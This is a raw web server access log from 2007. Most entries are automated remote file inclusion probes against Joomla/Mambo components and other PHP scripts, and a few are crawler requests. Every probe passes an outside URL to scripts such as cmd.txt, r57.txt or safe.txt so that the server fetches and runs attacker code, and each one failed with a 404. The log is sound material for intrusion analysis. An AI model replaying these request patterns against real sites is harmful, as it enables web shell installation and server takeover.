212.241.212.188 - - [12/Aug/2007:18:20:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:18:21:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.59.197.59 - - [12/Aug/2007:18:22:33 -0700] "GET /logs/access.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:18:23:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [12/Aug/2007:18:23:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [12/Aug/2007:18:23:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.210.102.125 - - [12/Aug/2007:18:23:51 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
202.153.128.112 - - [12/Aug/2007:18:24:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://nge.netsons.org/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.153.128.112 - - [12/Aug/2007:18:24:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://nge.netsons.org/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:18:26:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.17.159 - - [12/Aug/2007:18:27:06 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:18:28:37 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:18:28:37 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:18:29:32 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.152.209.160 - - [12/Aug/2007:18:29:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.152.209.160 - - [12/Aug/2007:18:29:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.152.209.160 - - [12/Aug/2007:18:30:47 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.152.209.160 - - [12/Aug/2007:18:30:48 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.210.102.125 - - [12/Aug/2007:18:31:05 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.132.163 - - [12/Aug/2007:18:32:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.grindsworld.com//administrator/components/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.132.163 - - [12/Aug/2007:18:32:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.grindsworld.com//administrator/components/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:18:32:10 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.148.104.7 - - [12/Aug/2007:18:32:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:18:32:30 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.17.12 - - [12/Aug/2007:18:33:24 -0700] "GET /?N=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
38.118.74.79 - - [12/Aug/2007:18:33:50 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
38.118.74.79 - - [12/Aug/2007:18:33:50 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.127.139.55 - - [12/Aug/2007:18:34:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:18:34:15 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:18:34:16 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.127.139.55 - - [12/Aug/2007:18:34:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:18:34:57 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:18:34:58 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
161.58.58.74 - - [12/Aug/2007:18:35:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
161.58.58.74 - - [12/Aug/2007:18:35:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:18:35:20 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
202.123.27.136 - - [12/Aug/2007:18:36:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bitchxx.iespana.es/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.123.27.136 - - [12/Aug/2007:18:36:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bitchxx.iespana.es/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.56.136.130 - - [12/Aug/2007:18:37:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.56.136.130 - - [12/Aug/2007:18:37:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
200.137.176.133 - - [12/Aug/2007:18:38:30 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:18:38:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.148.104.7 - - [12/Aug/2007:18:39:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
83.148.104.7 - - [12/Aug/2007:18:39:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:18:40:01 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.87.77.50 - - [12/Aug/2007:18:40:48 -0700] "GET /logs/access.log/p.php?p=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.77.50 - - [12/Aug/2007:18:40:48 -0700] "GET /p.php?p=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.77.50 - - [12/Aug/2007:18:40:49 -0700] "GET /logs/p.php?p=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:41:10 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [12/Aug/2007:18:41:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:18:41:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:41:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:18:42:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:18:42:43 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:18:42:59 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:18:43:28 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.211.196.5 - - [12/Aug/2007:18:43:31 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:18:43:31 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:18:43:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:45:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:18:47:12 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:47:53 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:47:53 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.225.237.43 - - [12/Aug/2007:18:49:58 -0700] "GET /logs/sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://mendes.phpnet.us/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.225.237.43 - - [12/Aug/2007:18:50:00 -0700] "GET /sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://mendes.phpnet.us/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
207.210.102.125 - - [12/Aug/2007:18:53:19 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:53:41 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:18:53:56 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:18:54:20 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:18:54:47 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:18:55:11 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:18:55:12 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.216.236.209 - - [12/Aug/2007:18:55:23 -0700] "GET /logs/index.php?go=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.209 - - [12/Aug/2007:18:55:24 -0700] "GET /index.php?go=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [12/Aug/2007:18:55:43 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [12/Aug/2007:18:55:43 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.25.227 - - [12/Aug/2007:18:55:43 -0700] "GET /cendoc/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.30.250 - - [12/Aug/2007:18:55:49 -0700] "GET /logs/index2.php?x=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.30.250 - - [12/Aug/2007:18:55:49 -0700] "GET /index2.php?x=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.195.2 - - [12/Aug/2007:19:01:12 -0700] "GET /logs/index.php?include=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.203.195.2 - - [12/Aug/2007:19:01:12 -0700] "GET /index.php?include=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.151.21 - - [12/Aug/2007:19:05:13 -0700] "GET /logs/index.php?include=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.21 - - [12/Aug/2007:19:05:14 -0700] "GET /index.php?include=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.231.186.101 - - [12/Aug/2007:19:05:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
194.231.186.101 - - [12/Aug/2007:19:05:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://bitchxx.iespana.es/bitchx? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:19:05:45 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:19:05:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:19:07:27 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:19:07:34 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:19:09:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:19:09:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:19:09:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:19:09:45 -0700] "GET /logs/index2.php?url_page=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:19:09:46 -0700] "GET /index2.php?url_page=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:09:46 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:19:10:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.57.241 - - [12/Aug/2007:19:15:56 -0700] "GET /logs/access.log/display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
209.172.57.241 - - [12/Aug/2007:19:15:56 -0700] "GET /display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
209.172.57.241 - - [12/Aug/2007:19:15:56 -0700] "GET /logs/display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:19:16:23 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.57.241 - - [12/Aug/2007:19:16:47 -0700] "GET /logs/access_070723.log/display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
83.148.104.7 - - [12/Aug/2007:19:17:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.148.104.7 - - [12/Aug/2007:19:17:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:19:18:06 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:19:18:06 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:19:18:32 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.43.204.181 - - [12/Aug/2007:19:19:24 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://frontierhotel.ie/site/cache/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.galf.org"
69.43.204.181 - - [12/Aug/2007:19:19:24 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://frontierhotel.ie/site/cache/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75"
66.80.60.44 - - [12/Aug/2007:19:20:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:22:42 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:22:43 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:19:23:26 -0700] "GET /logs/access.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:23:50 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:19:24:03 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:24:15 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:24:18 -0700] "GET /index2.php?content=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:24:19 -0700] "GET /logs/index2.php?content=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:24:47 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.199.227.66 - - [12/Aug/2007:19:26:36 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
